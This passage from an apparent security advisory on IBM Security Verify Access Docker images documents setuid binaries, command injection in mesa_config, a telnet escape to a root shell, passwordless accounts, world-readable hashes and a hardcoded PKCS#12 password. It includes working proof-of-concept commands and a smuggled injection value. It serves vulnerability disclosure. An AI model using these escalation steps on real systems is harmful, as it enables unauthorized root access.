been extracted and the `usr/sbin/slapd` program is `root:$group` and `4755`:\n\n    kali-docker# docker images\n    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE\n    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB\n    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB\n    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB\n    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB\n    \n    kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd\n    -rwsr-sr-x 1 root user 1916768 Jun  8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd\n\nWhile checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access instance. The owner is `root:ivmgr`:\n\n    [isam@verify-access log]$ ls -la /usr/sbin/slapd\n    -rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd\n    [isam@verify-access log]$\n\nBy default, `slapd` allows to load external modules (to execute code). These .la files contain information about shared libraries that will be loaded within slapd. \n\nContent of `/etc/openldap/slapd.conf`:\n\n    # Load dynamic backend modules:\n    # modulepath    /usr/lib/openldap\n    # moduleload    back_bdb.la\n    # moduleload    back_ldap.la\n    # moduleload    back_ldbm.la\n    # moduleload    back_passwd.la\n    # moduleload    back_shell.la\n    moduleload syncprov.la\n\nIt is possible to load malicious modules as root using a specific configuration .la file. This will allow a local attacker to get a Local Privilege Escalation as root. For example, we can find a default file that we can change into a malicious file by updating the libdir option to another directory:\n\n    kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la\n    # syncprov.la - a libtool library file\n    # Generated by libtool (GNU libtool) 2.4.6\n    #\n    # Please DO NOT delete this file!\n    # It is necessary for linking the library. \n    \n    # The name that we can dlopen(3). \n    dlname=\u0027syncprov-2.4.so.2\u0027\n    \n    # Names of this library. \n    library_names=\u0027syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so\u0027\n    [...]\n    # Files to dlopen/dlpreopen\n    dlopen=\u0027\u0027\n    dlpreopen=\u0027\u0027\n    \n    # Directory that this library needs to be installed in:\n    libdir=\u0027/usr/lib64/openldap\u0027\n\n\n\n## Details - Local Privilege Escalation using rpm\n\nThe binary npm has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root. \n\nUsing a static analysis, with the file system that has been extracted - the `usr/bin/rpm` program is `root:root` and `4755`:\n\n    kali-extraction-docker# docker images\n    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE\n    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB\n    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB\n    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB\n    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB\n    \n    kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm \n    -rwsr-sr-x 1 root root 21336 Apr  5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm\n\nWhile checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access docker image. The file belongs to `root:root`:\n\n    [isam@verify-access /]$ ls -la /usr/bin/rpm\n    -rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm\n    [isam@verify-access /]$ /usr/bin/rpm\n    RPM version 4.14.3\n    Copyright (C) 1998-2002 - Red Hat, Inc. \n    This program may be freely redistributed under the terms of the GNU GPL\n    \n    Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]\n            [--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]\n            [--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=\u003cpackage\u003e+] [--excludedocs] [--excludepath=\u003cpath\u003e] [--force] [-F|--freshen=\u003cpackagefile\u003e+] [-h|--hash]\n            [--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]\n            [--prefix=\u003cdir\u003e] [--relocate=\u003cold\u003e=\u003cnew\u003e] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=\u003cpackagefile\u003e+] [--reinstall=\u003cpackagefile\u003e+] [-D|--define=\u0027MACRO EXPR\u0027] [--undefine=MACRO] [-E|--eval=\u0027EXPR\u0027]\n            [--target=CPU-VENDOR-OS] [--macros=\u003cFILE:...\u003e] [--noplugins] [--nodigest] [--nosignature] [--rcfile=\u003cFILE:...\u003e] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]\n            [--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]\n            [--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]\n    [isam@verify-access /]$\n\nAn attacker can run rpm as root to add or remove any package in the system, providing a full root access. \n\n\n\n## Details - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes\n\nIt was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (`4755` - suid bit, with `root:root` or `root:ivmgr` as ownership) allowing any local user to run these programs as root: \n\n- - /opt/PolicyDirector/bin/pdmgrd\n- - /opt/pdweb/bin/webseald\n- - /usr/bin/rpm\n- - /usr/sbin/slapd\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_cli\n- - /usr/sbin/mesa_control\n- - /usr/sbin/mesa_lcd\n- - /usr/sbin/mesa_stats\n\nBinaries with the suid bit:\n\n    [isam@verify-access]$ ls -la /usr/sbin/slapd\n    -rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_lcd\n    -rwsr-xr-x 1 root root 57240 Jun  8 13:29 /usr/sbin/mesa_lcd\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_control\n    -rwsr-xr-x 1 root root 98448 Jun  8 13:29 /usr/sbin/mesa_control\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_config\n    -rwsr-sr-x 1 root root 2975680 Jun  8 13:29 /usr/sbin/mesa_config\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_stats\n    -rwsr-xr-x 1 root root 11176 Jun  8 13:13 /usr/sbin/mesa_stats\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_cli\n    -rwsr-xr-x 1 root root 436160 Jun  8 13:29 /usr/sbin/mesa_cli\n    [isam@verify-access]$ ls -la /usr/bin/rpm\n    -rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm\n    [isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd\n    -r-sr-sr-x 1 root ivmgr 32040 Jun  8 13:30 /opt/PolicyDirector/bin/pdmgrd\n    [isam@verify-access]$ ls -la /opt/pdweb/bin/webseald\n    -r-sr-s--- 1 root ivmgr 29296 Jun  8 13:30 /opt/pdweb/bin/webseald\n    [isam@verify-access]$ ls -la /opt/dsc/bin/dscd\n    -r-sr-s--- 1 ivmgr ivmgr 24264 Jun  8 13:30 /opt/dsc/bin/dscd\n\nFour trivial Local Privilege Escalations were found using the suid bit. Some additional LPEs may also exist in these programs. Trivial LPEs can be found everywhere in the mesa_* programs. \n\nAn attacker can get Local Privilege Escalations as root inside instances based on the ibmcom/verify-access image. \n\nThe code of `mesa_*` programs contains several trivial vulnerabilities due to the use of the `MesaSystem` function (and its derivatives) found in the `libwsmesa.so` library. This function is an insecure wrapper to the `execv()` function using the arguments `/bin/sh -c` and attacker-controlled values. The use of `/bin/sh -c` allows command injections. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Local Privilege Escalation using mesa_config - import of a new snapshot\n\nThe `mesa_config` program allows importing a new snapshot. This allows an attacker to get a Local Privilege Escalation as root by importing a new snapshot:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe function `MainApplySnapshot` will install the new malicious snapshot as root:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Local Privilege Escalation using mesa_config - command injections\n\nExploiting the `fips_zeroize_files` option in the `mesa_config` program will provide a root access. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe following PoC will provide root privileges inside the current instance:\n\n    [isam@verify-access /]$ id\n    uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    [isam@verify-access /]$ cat /tmp/test.sh \n    #!/bin/sh\n    id \u003e /tmp/id-2\n    \n    [isam@verify-access /]$ ls -la /tmp/id-2\n    ls: cannot access \u0027/tmp/id-2\u0027: No such file or directory\n    [isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files \"AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh\"\n    [isam@verify-access /]$ ls -la /tmp/id-2\n    -rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2\n    [isam@verify-access /]$ cat /tmp/id-2\n    uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    [isam@verify-access /]$\n\n\n\n## Details - Local Privilege Escalation using mesa_cli - import of a new snapshot\n\nThe main_cli program is also vulnerable to LPE. This tool allows managing the instance from any user:\n\n    [isam@verify-access]$ mesa_cli\n    Welcome to the IBM Security Verify Access appliance\n    Enter \"help\" for a list of available commands\n    verify-access\u003e help\n    Current mode commands:\n    diagnostics           Work with the IBM Security Verify Access diagnostics. \n    extensions            List and remove extensions installed on the appliance. \n    fips                  View FIPS 140-2 state and events. \n    fixpacks              Work with fix packs. \n    isam                  Work with the IBM Security Verify Access settings. \n    license               Work with licenses. \n    lmi                   Work with the local management interface. \n    lmt                   Work with the license metric tool. \n    management            Work with management settings. \n    pending_changes       Work with the IBM Security Verify Access pending\n                          changes. \n    snapshots             Work with policy snapshot files. \n    support               Work with support information files. \n    tools                 Work with network diagnostic tools. \n    Global commands:\n    back                  Return to the previous command mode. \n    exit                  Log off from the appliance. \n    help                  Display information for using the specified command. \n    reload                Reload the container configuration. \n    shutdown              End system operation and turn off the power. \n    state                 Display the current state of the container. \n    top                   Return to the top level. \n    verify-access\u003e snapshots\n    verify-access:snapshots\u003e help\n    Current mode commands:\n    apply                 Apply a policy snapshot file to the system. \n    create                Create a snapshot of current policy files. \n    delete                Delete a policy snapshot file. \n    get_comment           View the comment associated with a policy snapshot file. \n    list                  List the policy snapshot files. \n    set_comment           Replace the comment associated with a policy snapshot\n                          file. \n    Global commands:\n    back                  Return to the previous command mode. \n    exit                  Log off from the appliance. \n    help                  Display information for using the specified command. \n    reload                Reload the container configuration. \n    shutdown              End system operation and turn off the power. \n    state                 Display the current state of the container. \n    top                   Return to the top level. \n    verify-access:snapshots\u003e exit\n    [isam@verify-access /]$\n\nThe `apply` command inside the snapshots menu allows an attacker to install a new malicious snapshot as root and get a Local Privilege Escalation. \n\n\n\n## Details - Local Privilege Escalation using mesa_cli - telnet escape shell\n\nAnother LPE was found using the telnet client available within `mesa_cli`: it is possible to escape the telnet client using the `^]` keys and get a shell as root:\n\n    [isam@verify-access /]$ id\n    uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    [isam@verify-access /]$ mesa_cli\n    Welcome to the IBM Security Verify Access appliance\n    Enter \"help\" for a list of available commands\n    verify-access\u003e tools\n    verify-access:tools\u003e telnet test-server01.lan 22\n    Trying 10.0.0.14... \n    Connected to test-server01.lan. \n    Escape character is \u0027^]\u0027. \n    SSH-2.0-OpenSSH_8.0\n    ^]\n    telnet\u003e !sh\n    sh-4.4# id\n    uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    sh-4.4# touch /tmp/pwned-root\n    sh-4.4# exit\n    exit\n    ^]\n    telnet\u003e q\n    Connection closed. \n    verify-access:tools\u003e exit\n    [isam@verify-access /]$ ls -la /tmp/pwned-root\n    -rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root\n    [isam@verify-access /]$\n\nThe `sub_410330` function will `execv()` telnet through the `MesaSpawn` function:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Outdated OpenSSL\n\nIt was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022. \n\nAt the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable. \n\nAnalysis of the libssl.so.1.1.1k files found in the 4 Docker images:\n\n    kali-docker# sha256sum **/libssl.so.1.1.1k                                                                                                       \n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k\n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n                                                                                                                                                                                                                        \n    kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1\n    OPENSSL_1_1_1\n    OPENSSL_1_1_1a\n    OpenSSL 1.1.1k  FIPS 25 Mar 2021\n    libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug\n\nWe can confirm the OpenSSL version is provided by the package libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64. \n\nThe security announcement from Redhat patching vulnerabilities in the version libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64 is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818). \n\nThe packages patching the vulnerabilities are:\n\n- - openssl-1.1.1k-7.el8_6.x86_64.rpm\n- - openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm\n- - [...]\n\nWith access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:\n\n    [root@container-01]# podman ps\n    CONTAINER ID  IMAGE                                                                        COMMAND               CREATED      STATUS                    PORTS                             NAMES\n    413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                                4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    a2142514d831  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                        4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:9443-\u003e9443/tcp            verify-access-runtime\n    e0c55b6440cf  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                            4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:8443-8444-\u003e8443-8444/tcp  verify-access-dsc\n    [root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c \u0027rpm -qa|grep -i openssl\u0027;echo;done\n    openssl-1.1.1k-6.el8_5.x86_64\n    openssl-libs-1.1.1k-6.el8_5.x86_64\n    apr-util-openssl-1.6.1-6.el8.x86_64\n    \n    openssl-libs-1.1.1k-6.el8_5.x86_64\n    \n    openssl-libs-1.1.1k-6.el8_5.x86_64\n    openssl-1.1.1k-6.el8_5.x86_64\n\n\nThe official Docker images contain known vulnerabilities. \n\n\n\n## Details - PermitRootLogin set to yes\n\nIt was observed that the configuration file `/etc/sysconfig/sshd-permitrootlogin` will allow the connection from root in the Docker images:\n\n    kali-docker# find . | grep sshd-permitrootlogin\n    ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin\n    ./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n    ./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n    ./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n    kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n\nIf a SSH server was installed inside the instances, it would be then possible to login as root. \n\n\n\n## Details - Lack of password for the `cluster` user\n\nIt was observed that the `cluster` user in the Docker image verify-access does not have a password defined in the `/etc/shadow` file:\n\n    kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster\n    cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh\n    \n    kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster        \n    cluster::19151:0:99999:7:::\n    \n    kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow         \n    admin:admin:19151:0:99999:7:::\n    cluster:NO PASSWORD:19151:0:99999:7:::\n    \n    2 password hashes cracked, 0 left\n\n\nIn the live environment, it was confirmed that the user `cluster` does not have a password in the `verify-access` instance:\n\n    [root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster\n    cluster::19151:0:99999:7:::\n\nIf a SSH server was installed inside the instances, it would be then possible to login as cluster without a password. \n\nA user with a local access can get `cluster` privileges. \n\n\n\n## Details - Non-standard way of storing hashes and world-readable files containing hashes\n\nIt was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:\n\n- - `/etc/shadow.isam`\n- - `/etc/admin.pwd`\n- - `/etc/wga_notifications.conf`\n\nFurthermore, the `/etc/shadow.isam` and `/etc/wga_notifications.conf` files are world-readable. \n\nWhen extracting verify-access, we can find the `/etc/shadow.isam` file:\n\n    kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam\n    admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n    www-data:*:14251:0:99999:7:::\n    ivmgr:!!:19151:0:99999:7:::\n    cluster::19151:0:99999:7:::\n    pgresql:!!:19151:0:99999:7:::\n    nfast:!!:19151:0:99999:7:::\n    tivoli:!!:19151:0:99999:7:::\n\nWhen checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:\n\n    [root@container-01]# podman ps | grep 413823e2f7d1\n    413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    [root@container-01]#\n    \n    [root@container-01]# podman ps|grep 413823e2f7d1\n    413823e2f7d1  ibmcom/verify-access/verify-access/10.0.4.0:20220926.6                         25 hours ago  Up 25 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    [root@container-01]# podman exec -it  413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd\n    -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n    -rw-r--r-- 1 root root 305 Jun  8 13:43 /etc/shadow.isam\n    -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n    [root@container-01]#\n\nFurthermore, we can extract passwords from these files. The hash in `/etc/shadow.isam` seems to be hardcoded (`admin`):\n\n    [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam\n    admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n    www-data:*:14251:0:99999:7:::\n    ivmgr:!!:19151:0:99999:7:::\n    cluster::19151:0:99999:7:::\n    pgresql:!!:19151:0:99999:7:::\n    nfast:!!:19151:0:99999:7:::\n    tivoli:!!:19151:0:99999:7:::\n    \n    [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd\n    -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n    [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd\n    [REDACTED]\n    \n    [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf\n    -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n    [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf\n    [...]\n    sam_cluster.hvdb.driver_type = thin\n    isam_cluster.hvdb.embedded = false\n    isam_cluster.hvdb.port = 1536\n    isam_cluster.hvdb.pwd = [REDACTED]\n    isam_cluster.hvdb.secure = false\n    [...]\n\n\nA local attacker can extract hashes from world-readable files and elevate its privileges. \n\nThe use of `/etc/shadow.isam` is unknown. \n\n\n\n## Details - Hardcoded PKCS#12 files\n\nIt was observed the Docker image verify-access contains hardcoded PKCS#12 files:\n\n- - /var/isam/cluster/sundry/odbc/ewallet.p12\n- - /var/pdweb/shared/keytab/lmi_trust_store.p12\n- - /var/pdweb/shared/keytab/embedded_ldap_keys.p12\n- - /var/pdweb/shared/keytab/rt_profile_keys.p12\n\nThe `/var/isam/cluster/sundry/odbc/ewallet.p12` file can be found inside the verify-access image:\n\n    kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n    -rw-r--r-- 1 5000 5000 736 Jun  8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n    \n    kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n    687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n\nWhen checking on the live system (verify-access), we can find this unchanged file:\n\n    [root@container-01]# podman ps | grep 413823e2f7d1\n    413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         26 hours ago  Up 26 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    [root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/\n    total 16\n    drwxr-xr-x 2 www-data www-data 4096 Jun  8 13:43 . \n    drwxr-xr-x 3 cluster  cluster  4096 Jun  8 13:43 .. \n    -rw-r--r-- 1 www-data www-data  781 Jun  8 13:32 cwallet.sso\n    -rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 cwallet.sso.lck\n    -rw-r--r-- 1 www-data www-data  736 Jun  8 13:32 ewallet.p12\n    -rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 ewallet.p12.lck\n    [root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12\n    687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  /var/isam/cluster/sundry/odbc/ewallet.p12\n    [root@container-01]#\n\nThis file is used by several programs, with a trivial password (`passw0rd`) to encrypt it:\n\nAssembly code of the function `authorSqlFuseFiles` found inside `mesa_config`, used to extract ewallet.p12:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nExtraction using OpenSSL:\n\n    kali-docker# openssl pkcs12 -in ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test        \n    Enter Import Password: [passw0rd]\n    kali-docker# cat /tmp/ewallet.test\n    Bag Attributes\n        localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04 \n    subject=C = us, O = ibm, CN = rhel66.home.com\n    issuer=C = us, O = ibm, CN = rhel66.home.com\n    -----BEGIN CERTIFICATE-----\n    MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV\n    BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx\n    N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY\n    MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB\n    iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1\n    IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR\n    71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG\n    SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so\n    1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+\n    ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64\n    -----END CERTIFICATE-----\n    kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout                                                                                                                              \n    Certificate:\n        Data:\n            Version: 1 (0x0)\n            Serial Number: 0 (0x0)\n            Signature Algorithm: md5WithRSAEncryption\n            Issuer: C = us, O = ibm, CN = rhel66.home.com\n            Validity\n                Not Before: Jun  4 18:20:17 2016 GMT\n                Not After : Jun  2 18:20:17 2026 GMT\n            Subject: C = us, O = ibm, CN = rhel66.home.com\n            Subject Public Key Info:\n                Public Key Algorithm: rsaEncryption\n                    Public-Key: (1024 bit)\n                    Modulus:\n                        00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:\n                        ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:\n                        a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:\n                        6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:\n                        0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:\n                        6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:\n                        da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:\n                        7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:\n                        69:1a:e9:5f:66:c1:60:cf:7b\n                    Exponent: 65537 (0x10001)\n        Signature Algorithm: md5WithRSAEncryption\n        Signature Value:\n            